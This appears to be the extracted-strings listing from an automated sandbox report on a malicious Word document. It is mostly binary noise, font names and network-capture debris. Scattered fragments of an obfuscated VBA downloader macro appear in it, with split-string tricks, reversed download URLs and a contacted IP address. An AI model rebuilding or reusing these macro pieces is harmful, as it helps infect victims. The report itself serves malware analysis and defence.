4!4(4/464=4L4z4
Ansi based on PCAP Processing
(network.pcap)
41@2KCrItA69041JX ivPwP6836aLajmWJwHfcWA
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
4245BS8bPsq* GBIIwE
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
43980,klm1'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
4429jNjBO8203 * NFaHudStr(9 7948),aQNjqQicmVOPEnd [
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
484@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
Ansi based on PCAP Processing
(network.pcap)
4<MX/OZ2H!cD 7IC9ExC9EMX/OZ2H!cME(S"SS"6"(1Normal.ThisDocument0(%`%(%*`
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
4aWW000X000X0rU@(`/(A`/(`/$`
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
4F+8JI$rVLvVxNN";fVYx-,JfV<+k>hP!aLfh:HHX WQXt,:JU{,Z BpB)siE4(=U\.O.+x"aMB[F7x"ytK-zz>F>75eo5C9Z%c7%6M29B"N
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
4fiIIsowkw9zu1c1c1c1c$' ' O NXX n DX X' ' S U vXX X X'miYJYs&&!%TjDEXVkGksKp%!4iJh$' ' # % XX A
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
5 5$5(5,5054585<5t5|5
Ansi based on PCAP Processing
(network.pcap)
5* aLzqLjU263"4AVq6BDvpuMZD`++zPHvPqrDOGFFzX(qqfqsASq0qVzNB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
5082~EmbB<80bRzDlZ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
55894"wwEBa`5264@WiSdHL
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
56X* jZGkJC
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
570KMqatvUhjlU@qcuLdb.8Z59uesf7P82066?J$_"0wMvJHlpMDPBs@bIRmK(UnUL0uoYTbQ1!81@mFRcGi5660wIbi|XoPRIPjCvXhz!5@vYcMwre84r'bijTVq0jdbboM0
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
5758fuMlVxiAAu =mjjFqa941AUoABHTe83487q6rZHTparPdJvKphzufIAccjic.vQCVAP(EltvKLpXG34EVrGDVw
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
5aGOLLwB!3925CvhwPNh0
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
5CuazX.QB0ljhBFn`9 wpQUbv!3Om0VrmfhhwfOl0aYofqzcWsEp$"WWJRAHC[+1P01][+75C[( eCAlpEr-69]iw.412 L+ A, %50 `itbVQZ OCYaVc
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
5P5X5\5`5d5h5l5p5t5x5|5
Ansi based on PCAP Processing
(network.pcap)
5Q@LbpUXX(363]zllLr@746A]duGXL'39646A]wZNG]azAUd'tMMvPYQ#wQpJm("t.mU9+u.oc.yeladhtiDek//:ptW3mZ", 1`5@)A382+$@wSCNOA$BUjPjfOZzj(SwdQGpHciCkQ66436L HkajsL4306FuTuRKivBe4753MXCkzAR2* mHZwrS!L4467LAmLvnFNmzBL@(HsMznz@$LKiaZZ
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
5W5WIntb ZAZjtTrjl5F$'$X ' O t XX ) X X''l
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
5XcR=%RsCOuwtHJRpYL% 3a$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
6 6$6(6,6064686<6@6D6H6L6P6T6
Ansi based on PCAP Processing
(network.pcap)
6 6$6(6,606h6p6t6x6|6
Ansi based on PCAP Processing
(network.pcap)
6 kOfWrnZBf% tes&&r^e=%Sf.W,$'<
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
6&&IEGv;FO\4-Sra)RmNAlK[D!
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
6'gpc_48.gRLB@lr++cxg]u{[+-JG_#G*>
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
6.0 built by: WCSETUP
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
6071RcMJdmV`880P-irAqs
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
64062AdSlPuwhVQvUtF(NTKLZ$XsjLj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
64318$G BOzwJ69832 * TQbLt5Str(@46314)-I`HphHsw KjHBsRvKXfTIFJmBAQQDtHUQmzjftdaLl86085APzIotH=20461PHwXznO70705mGqrEF 49019OfELiUlP80369PuXtbqH1PKlwQvfPRanZswQpJm("Y0BU9nar 6)tQO*+
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
667v2wjCzaJ59490B
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
69OJmsA216171dz iikWriqphw YETmF WTjMH
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
6`?@nlkfhT"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
6u>V<w.>aJWU-uTr7z]iWRE+X{cX_cq?'t3U^VGi!sY7{[og~:_^}6+gmKz~oeE^^X4z'GuM8c?k*}6T*(XB?eMCb(N`((((((((((((q(9?R5q'#aj-&2qwG{rs$_Hn*Dd~^xzOXSTQs}a&8]*AIy~+A R?5oWN+Eo
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
6XX -M X X'e. "' & ( *o% ,VXX . 0X 2 4X'$oX <': @ B D F;XX Hv J,X L NX'>ta.DuroH@nAttribute VB_Name = "zTZADLcFXJt@FRE"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
6ZZJqm4tBBBBB$'L P'N T Vs2 Xz ZeXX \T ^
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
7 7$7(7,7074787<7@7D7H7
Ansi based on PCAP Processing
(network.pcap)
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7
Ansi based on PCAP Processing
(network.pcap)
7 XXX n> X X'bkR,mU9+mU9/mU9+mU9/:pttmU9+G.3333$'
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
7-A?>iO6~{v5-89F.<G8#5NbpUckE @9E((((((((((((((((((((=x>Q@Q@Q@Q@Q@Q@Q@Q@Q@Q@((((JXip/lg;>116*O+v
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
703UaSdJLATo702vmszBN35296uHjJlo774UIFKXVhJH2fPRtRoqAase5XcR=%RsCOuwtHJRpYL ap47362, %14#@ATM0&= zABlzYiPQL(imSJB wiIYRp 25FLOTbT3&Q
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
70888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
Ansi based on PCAP Processing
(network.pcap)
71800A$qIjPw27579 * jUtv50555ylBNhc4ioIKzDPiJohHRRRrE
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
75075%AwqoZcp7* cbzXEiT%
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
77107$LnzlWW44716 * QzfNYh6Str(@79242)[R0iTzT>NaPLIcEnd
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
776#WOSuMpCZTvldhdBs6V TGHTG`Gq jH2LX742`+ pJ$"XtcRfflumHXJ UfPwj@EBwobGHYv,PVp25aKAoA3808
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
785wLvi60`2zMIplv506 CTzwTm!%
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
7872#ojjoBw!o8208$WzsjO7673XiPcIAlBslONhiDbVW0
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
7p$NwjKbA203!BUrcG
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
7w2m@s^{4}X6pR9$fOK$l%n8'Pk'f>i..yi%`-IQcO0zg!ej
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8
Ansi based on PCAP Processing
(network.pcap)
8$9,9094989<9@9D9H9L9P9T9X9\9`9d9h9l9p9t9x9
Ansi based on PCAP Processing
(network.pcap)
8'6 < >| @ BzXX DF F2X H JX':
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
81.21.67.85
Ansi based on PCAP Processing
(PCAP)
82I LEnrv&#TSRaT!#EoHkS$#5FZ9th}@a[]qwf4j67Mt/'.arBenegnc"fi//wth dpP90uCa!E602342 E$03`BcJNpMMHl08o
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
8558"TcDjJBRV
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
875E* IOYTB754bUtclGB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
8918kdiBALS21517B@DWQVMm@83705
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
892DEEhW`ouib
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
8DLT\Normal.dotm1Microsoft Office Word@@W@W.+,0hp|
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
8PK!g theme/theme/theme1.xmlY?4}O3d=HTwbS.&!,.1$?"[UR0aF0t~{S^&\t$z=!Q@o?_EG2@>GRU1a$N%KjVkUDRKQj/dR*SxMPsJ5$4vq^WCD{>`3REB=UtQy@\.X7<:+&
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
9263AeYwWhNB@Rtsozb(k hWJUo@$FuuQh
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
9479bu8dJSbopss8534GQsAkaXp69!loh CC@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
94922bAmup.259Q_EbqGDEJU-906sQ0wfwstKlHo
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
9672UULYvpbS
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
9848B9#dBkZ10208 * cVKBZ4Str(43104)WEYJifO= KRRIEZYsnKJYcRBVbvpi(@IRTAFY.k QSjTQ27562PdDcWq>30454APScGoUP483PKVmmiv35230P XnPXYP90150PswEwl0PsNHnOwPqtQDNzPzwjlS
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
9?6U0X}yU72`t&'dvTsHp&?:D|W>7T>,xV?^>G#|rh[ZxwOVYVEc=kR,&$KE2B(((((((((((((_G_G3?O9*uOF37S/-xGR~gEyXkk=/Op+uAt\H2~EC_7/l?_;o4_"y1?~(lB)H!yd`Yx.^kW\G ?]8yh'72~+JEF401ZlY/}9Q^!G;
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
9dTjUFdmk%
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
9eJ AfBPV
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
9H9P9T9X9\9`9d9h9l9p9~5
Ansi based on PCAP Processing
(network.pcap)
9KwlUfBUd7478ba0ICmpXNpQT
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
: :$:(:`:h:l:p:t:x:|:
Ansi based on PCAP Processing
(network.pcap)
:<:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
Ansi based on PCAP Processing
(network.pcap)
:@asjHJXS AZjXP DDaTS
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
:ActiveX
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
:KhaljHrPEoYWh/MnzvitlhLDG9aOhEfuUXvcfdjQWaj9aIiljs>OzPiZHJnubQjAzkjGHQTiHAboiDznLl`BQzCwamLbf.kWSoitciPECz>PnGQfPGwkhHqMMwYvHhVsHiwkDEW?hzjsfckzwQuVELARIA0RljnjZdqIuSnXM$jnkMCAxLZSqzr-pZUvwSkGwutoP&GzrzcMvwlBVNVYXYmwFzifntthqwZ9zrpCROFwjjoo]iSCNs5QTncHQ\GJQUO+VHXWtJerzocPOgljSHaW|llfVuRfJGwToHLTWAZXTilvvpWmiC7wdSnWzTYkCHFSQKZ,VTfGrTvKfZXwWKpXwLJ1RahjrcqrLMvQCwMwDtbSaWihNmXancbc*jNfKkB]PVwSdLqMcbtR+MuszVvzYkTokjmSULDEaQww:LjKuvTnKOUv}aiJSOCvbwoazWW8lqnZE#YBMAJ.dRtbEzAVvICCWIMYf~zkJLXUrAYbQJC=WzGdl|sRXULwrABpjq>-OujdzzpuhjaXDAQDXlzcovn/NLRQoDY:DEEhW'kouibFmLHVORhKlBbjB,SmZcwv"LzqMAC*ABEmrNAiEjifo3rWuwUbUVIJwCZnVvrLZsjF^
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
:X < >X'.X B'@ F H8 JA LXX N PYX R TX'D
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
; ;$;(;,;0;4;8;<;@;x;
Ansi based on PCAP Processing
(network.pcap)
; =d%T,om3h-6JN.Oh-@6F4RPvEJ6( k*Ak*Mm.>PkTICv27Y}2t"!Za@-(SQEQ$R$C\
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
; j9*&6B$
Ansi based on PCAP Processing
(network.pcap)
;T;\;`;d;h;l;p;t;x;|;
Ansi based on PCAP Processing
(network.pcap)
< <$<(<,<0<4<8<<<@<D<H<L<P<T<X<
Ansi based on PCAP Processing
(network.pcap)
< <$<(<,<0<4<}5
Ansi based on PCAP Processing
(network.pcap)
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>L#@0(
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
<i#fKS4(}M:N\W`mR\iX%}Iut0=k>kJ#Tf_dZ/RNXFIVnu Cij(&Kh4nB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
<X X'$ ' 2 %XX =X X' L 8 z
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
= =$=(=,=0=4=8=<=@=D=H=L=
Ansi based on PCAP Processing
(network.pcap)
= C?hv=%[xp{_P<1H0ORBdJE4b$q_6LR7`0O,En7Lib/SePK!kytheme/theme/themeManager.xmlM
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
=$'~& ' @ * XX Tx X X' ' D iPXX % X X''JmU9+spnZBf%!!%RsCOukicia|a|a|
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
=$=(=,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=
Ansi based on PCAP Processing
(network.pcap)
=4><>@>D>H>L>P>T>X>\>`>d>h>l>p>t>x>|>
Ansi based on PCAP Processing
(network.pcap)
=i3$g3vt(tw8bF62J[=Udazz
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
> >$>(>,>0>4>8><>@>D>H>L>P>T>X>\>`>d>
Ansi based on PCAP Processing
(network.pcap)
>(?0?4?8?<?@?D?H?L?P?T?X?\?`?d?h?l?p?t?x?|?
Ansi based on PCAP Processing
(network.pcap)
>bOZZse14552AbXkRCR924@* LWzTDhe3@A5af0EwpAbVAmWScwAkELTD@d>w02;)CDSAx34 U91 ,U9H)(p$e9g NDtfi`rtSoTlqsv929734wb, E66$ljGSmk@ tKLaL9jmvUh(DwvJak`suWwvr4258ec rEDNS 644'9KUdmw990$iFRoZb5367 9@zrBsHw$7600BcfUWrrHPEfnA`oCahOAHjokjB
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
>tkI.Ox"dWt
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
>VYUb;bjbjGG.%d%d+++++????K?WWWWWFFF]]]]]]$<!*+FFFFF++WWZZZF
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
?\&$*\Rffff*0<5cd8073f4&"bx"bdh`p"bPfX"bH`dh"bPfXd0"8@bH 0'. 4 6Wt 8% :MXX < >~X @ BX'2lato J'H N Pl RFw T)XX V XX Z \X'Ltu `'^ d fF ho jyFXX lp nY-X p rX'b v't z |y ~ XX G EvX X'xo(X ' .8 0XX +y |X X'58.72 ' R l
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
?L?T?X?\?`?d?h?l?p?t?x?|?
Ansi based on PCAP Processing
(network.pcap)
@$y>U1I>+3BF"*)XwvTMNr+m\kaTJzR@E!csI
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@1AdKTm.YAB2GjmJwm(64514(aBAYi!(5691BiHzMuAiLLMJC ZiFiT0zufSGR7izc[,)901]raHc[+$5875(EcAlPer-),')7]@943@[eCrtf82p42388b,: F9uwmawHWuTop
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@1cDqEX`00QtmpFLSu52px2izLuOATzGT!RbAHnuicl
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@6u2bjnqC4
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@=s.]xjW5gWH@VUbNpP)gY=W^5cVOGGH*x4FK/ZQDyePdCp=A8M-sw>MEu-+XXomne-%\4`8,>b6h
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@`eVQ<BmuOs(-R8&;O
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@Aq-QEQER sih((ByREPEP$2r}h
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@Arial Unicode MS
Unicode based on Runtime Data
(WINWORD.EXE
)
@aUPkBz(YhkAPVUiVu1A6(@YjTvzp68463E(nTVot(83577AWfWli94338(LCdzbME(77145A(ztozYAtA(TmLOA@(N OLVSL@$wzIizt
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@BatangChe
Unicode based on Runtime Data
(WINWORD.EXE
)
@DFKai-SB
Unicode based on Runtime Data
(WINWORD.EXE
)
@DotumChe
Unicode based on Runtime Data
(WINWORD.EXE
)
@dUojswlUfUOaICmpOXNpQTv
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@FangSong
Unicode based on Runtime Data
(WINWORD.EXE
)
@GulimChe
Unicode based on Runtime Data
(WINWORD.EXE
)
@GungsuhChe
Unicode based on Runtime Data
(WINWORD.EXE
)
@hzTwZJ!
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@Malgun Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
@Meiryo UI
Unicode based on Runtime Data
(WINWORD.EXE
)
@Microsoft JhengHei
Unicode based on Runtime Data
(WINWORD.EXE
)
@Microsoft YaHei
Unicode based on Runtime Data
(WINWORD.EXE
)
@MingLiU-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
@MingLiU_HKSCS
Unicode based on Runtime Data
(WINWORD.EXE
)
@MingLiU_HKSCS-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
@MS Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
@MS Mincho
Unicode based on Runtime Data
(WINWORD.EXE
)
@MS PGothic
Unicode based on Runtime Data
(WINWORD.EXE
)
@MS PMincho
Unicode based on Runtime Data
(WINWORD.EXE
)
@MS UI Gothic
Unicode based on Runtime Data
(WINWORD.EXE
)
@N!Y]i-TnRB8zmmwSRtO"i32<`3xSP]"M9;
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@ocHjsC(iiJIQLqEdjX96136A$qpbDn199cqMofSdj@29py3BBZZCr|@* zfvbLFAPt90AAoKuzmqEsQSpi0DvLwDD@sGPRq
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@PMDtoM(jDthiT /@ jTCfj26953Fix(lFBKMG))b75181QCLng(WIkWjT91490fqVwN28050 * aUcUVvStr(8709)-BbdHCbGtDhlQ@jjNdYAIjmcSfw
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@PMingLiU
Unicode based on Runtime Data
(WINWORD.EXE
)
@PMingLiU-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
@pmWAVcQlnMCZ+QIUBQj76795
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@SimSun-ExtB
Unicode based on Runtime Data
(WINWORD.EXE
)
@tthqwZP(0zrpCwjjo19429UniJsp9AR QTncH72819BGJQU92JVHXWtJ27441rzocPOP@ljSHaW@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@uYuUfZLiVibUjrBjW7383czVhRR9 C3a
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@YzrqFa|aCOYjz
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
@}w7c(EbCA7K
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
[ m=|ImCUqqV9p>H&QXlXxW\mkW
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\
Unicode based on Runtime Data
(WINWORD.EXE
)
[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\New Microsoft Word Document.docx
Unicode based on Runtime Data
(WINWORD.EXE
)
[F00000000][T01D3EDB4825FD0D0][O00000000]*C:\
Unicode based on Runtime Data
(WINWORD.EXE
)
[F00000000][T01D3EDB482615770][O00000000]*C:\02vPLpWc.doc
Unicode based on Runtime Data
(WINWORD.EXE
)
[g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
[Host Extender Info]
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
[W0f0O0`0U0D0
Ansi based on PCAP Processing
(network.pcap)
[Workspace]
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
\>XX ^ `X b dX'T h'f l nEP pO r1XX t{ v9X x zX'jY0BU9nar )mU9+mU9JQOtmU9+mU9JmU9+mU9QO+JQOcemU9+mU9jmU9+mU9bo-wJmU9+mU9QO+JQOemU9+mU9JQO+JQmU9+mU9OmU9+mU9nJQmU9+mU9O(mU9+mU9& = dmU9+mU9smU'+'9+mU9adasnAx1mU9(( '(( ( )'x'+]03[emohS2,UUUU$'| '~ P r<XX fJ /$X X' ' Q '~ oXX MSX X'PzTBfU9+mU9OmU9+mU9tcejbmU9+mU9o-JQO+JmU9+mU9QOwJQO+JQmU9+mU9OenJQmU9+mU9OmU9+m'+'U9(mU9+mU9'+'. =mU9+mU9 UmU9+mU9YYmU9+mU9A'+'mU9+mU9x1'+'mU9+mU9;modmU9+mlOOOO$' ' m t BVXX PX X' ' k 'w |XX QT X X'=eiEmU9h@/4mU9+mU95mU9+mU9AQT/moc.akhcmU9+mU9si/mU9+mU9/:pttmU9+mU9h@/zoamU9+mU9R/ppa-pmU9+mU9pw/k@rnEpQQQ^Q$' ' Z i |QXX L eX X' '
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
\^[A:P=q[pFR#1[#7I=nwU::gQ6kHmF-VUX2yKYw;~@r=co|?PVyG,8ht.o&I#H .|sam%a%m&.u(O"
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
\Z8WRxY5xkX{o,AqI'J(>}JK|G}$obDp] d`soLuYm\U+qer:>V%rc8m_WOJ}K
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
\|'m#W$mx2.2+A=h'QnpZ/?X5lyY8u9tIN4[)f6~dh#Oo:muZIYX{*QG~L{ww$Mq&::XozM'zSC%`amKq&{sqKu-4m ch
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
\|'m#W$mx2.2+A=h'QnpZ/?X5lyY8u9tIN4[)f6~dh#Oo:mu{ZIYX{*QGKx[WyD7b61$ulW{H$A8kVSx&_3}Qg,s=O15]f[j,g''}'Z3|;xFS\G6cw
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
]ZkDK8I=^{E[\6wygMmqa(?r8Z"xhk,-^C:91',Z+mq{xRkmI=zW0(([$l7g9G!y6|djJ],x&m&Dw.bD(Z9v1.rzs=^yRh'5`I!d
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
^([2+xt=RQZzy=Fog1pP?d^O}3Y7_}s2C#f[-=O+)W^1MEG+xYyi[M*!=W0i&aP*cJ.G\duSq]2
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
^`dhBd dD@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
^smkq<'ldZme5tSG8Pm#|:~^[,ka&&f5{7VR"4[v`v`1-=]Dx#eDj>ND.Y7|Fs
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
_?_?_?M_L_
Ansi based on Image Processing
(screen_0.png)
__?mJ____q_?,,?,??m??_?_v__,,,_,,
Ansi based on Image Processing
(screen_0.png)
_________
Ansi based on Image Processing
(screen_4.png)
__________
Ansi based on Image Processing
(screen_8.png)
__SRP_1$__SRP_2
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
_A6NS KV\ItKyV;o?>&&b63/|r'g;E/V}O*o~Kkq?rk|e>K"]=J!gj31+^v_V{WN)tx/-f=*O^#9(.-4L@-@=VVgGmu|*\gr{gSB^UFiG2KzGKZm?[;S/u&iG`2#]U|V<W]*PzzmynC)xRk0P"ld`?z=}^sXoZ!~AWduZY0pv{5QK1I&#m}5]707lSS]05g2LFm9:F$o5f3O0wi",
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
_a9_.1011
Ansi based on Image Processing
(screen_4.png)
_CQW0j0D0
Ansi based on PCAP Processing
(network.pcap)
_CQW0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
_g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
_JJ_a__v_aat_n__n_a_tIla__a
Ansi based on Image Processing
(screen_4.png)
_L0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
_L0ckW0O0j0D0
Ansi based on PCAP Processing
(network.pcap)
_L0ckW0O0}5
Ansi based on PCAP Processing
(network.pcap)
_peL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
_uiRM.Y<VaW8m>W7./\Vh$5vy"dP,YOw:DZV.b9
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
_v__crc_c_
Ansi based on Image Processing
(screen_4.png)
_VBA_PROJECTFPAOsHRZpzGcVHYQzTZADLcFXJtFRE7PROJECTdV
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
`0owVBjAg5643APcwM1257zflwD1A
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data
(WINWORD.EXE
)
`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}
Unicode based on Runtime Data
(WINWORD.EXE
)
`S0C6Xo}wEq~.j%\XGO1<sS35k$`28[/=s/5%}mcc);PmO@!T3@6v>a lySh/7zouO\&8,u{U[jsawY}[w(n#a
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
`TuLru$(7A$QHSNH90228.McXBL.ZwJE.ZWhhiPzo1wC,6a$JQO8r%Jq=578~9r=p=$6izmmpq( ozAQWvjYsnLVHOEQ3PwUlHL!021725WVdpVdFir- LLBcC`!3437ZQQDYN7954MuTNr57JLXLa DPhzE
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
`X X'OB2UMNJ=%VHTUTCEY0Cd.bbbb$'j ' AeXX / +?X X'U9nJ ' P H SXX 5X X'YZ&p=%TjDEXVkGksKp% tps2SAEEEE$' '
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
`zSjzEaAyZaQWbz30963HBGDOi887-AcjiHJUe94007LfN$BZ33* @RVMaCM%322Xrazs "LRQJoR@AcFariHSO2SQu.EozMFTWzaojzGLMGX275315Aeb, E-A@
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
a iDYuFSTqVnDfRGE
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
A ZcDditiZDN
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
A18215=aiSMGjEVUXjA(lWBNc$TOqzhj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
A5g@uh3>3-;:]*
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
A;L11A; MNkGY;PsztPn(GjhANT$BGLkmj
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
AaBbYyZz
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
Agency FB
Unicode based on Runtime Data
(WINWORD.EXE
)
AgentAnim
Unicode based on Runtime Data
(WINWORD.EXE
)
AIjza(hWYZq / @HNCjjs18890Fix(zwQqFr)) + 83688 - CLng(nabaH 70764#qvNnq33935 * ZPvSI3Str(55930)XmtpiU<BrsrBiEnd
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Algerian
Unicode based on Runtime Data
(WINWORD.EXE
)
Angsana New
Unicode based on Runtime Data
(WINWORD.EXE
)
AngsanaUPC
Unicode based on Runtime Data
(WINWORD.EXE
)
anguage Specific Resources
Unicode based on Memory/File Scan
(166520.exe
, 00047358-00002132.00000000.47862.00191000.00000002.mdmp)
Aparajita
Unicode based on Runtime Data
(WINWORD.EXE
)
aQDWOjHWkzQXuDUL 31391@tludbP850fGRmvrv!F=6121Qoaul+ 550$P! RSmEzg!73pzuaNpauwXrqk!00IIDrcPuRTRQp5+ KpLRiDHzwV
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Arabic Typesetting
Unicode based on Runtime Data
(WINWORD.EXE
)
aRhncErOiq
Ansi based on Hybrid Analysis
(02vPLpWc.doc.bin)
Arial Black
Unicode based on Runtime Data
(WINWORD.EXE
)
Arial Narrow
Unicode based on Runtime Data
(WINWORD.EXE
)
Arial Rounded MT Bold
